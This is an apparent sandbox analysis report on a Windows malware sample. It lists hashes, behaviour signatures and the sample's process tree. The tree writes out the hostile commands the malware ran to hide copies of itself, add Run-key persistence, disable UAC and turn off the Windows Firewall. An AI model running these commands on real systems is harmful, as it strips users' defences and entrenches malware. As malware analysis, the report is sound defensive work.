Analysis
-
max time kernel
140s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
13/07/2024, 11:45 UTC
General
-
Target
4188928d42578d01826be310ed423f73_JaffaCakes118.exe
-
Size
399KB
-
MD5
4188928d42578d01826be310ed423f73
-
SHA1
80d1baa6e7384eef1403d6591fcb433a098ba3da
-
SHA256
d6aeb417cf10f28c0f27f6320ee26bbebe4b7da01e1ce7067a2c5353412821d1
-
SHA512
4440ee125d00a98fc38621da9e74adeb3ba84d5a3fd99bc58530d1f4574b9e12db34f10d1e1772d232d6c75f2001303b1723aeb2fadbf20892103ce898bebb24
-
SSDEEP
6144:ipPOC3QN319eNYsHD3AAGoHQH9sWV16w2DklypareA51Pqr+Hf:mODE5HD3LGoHQZykorA51Sg
Score
10/10
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 24 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Drops desktop.ini file(s) 7 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops autorun.inf file 1 TTPs 22 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Modifies Control Panel 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 28 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 42 IoCs
Processes
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe1⤵
-
C:\Windows\system32\csrss.exe%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=161⤵
-
C:\Windows\system32\wininit.exewininit.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch3⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe4⤵
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted3⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService3⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork3⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"3⤵
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation3⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe3⤵
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe2⤵
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe2⤵
-
-
C:\Windows\system32\csrss.exe%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=161⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1145587658-1001975761-814076306-932973715-8299959871176630514857513004501955106"2⤵
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scrC:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr /s2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies Control Panel
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\advant.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%windir%\system32\pcclean.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon3⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost3⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV3⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser3⤵
-
C:\Windows\SysWOW64\net.exenet start browser4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"3⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiSC:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\advant.exe"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f5⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%windir%\system32\pcclean.exe"4⤵
- Drops file in System32 directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon4⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost4⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser4⤵
-
C:\Windows\SysWOW64\net.exenet start browser5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
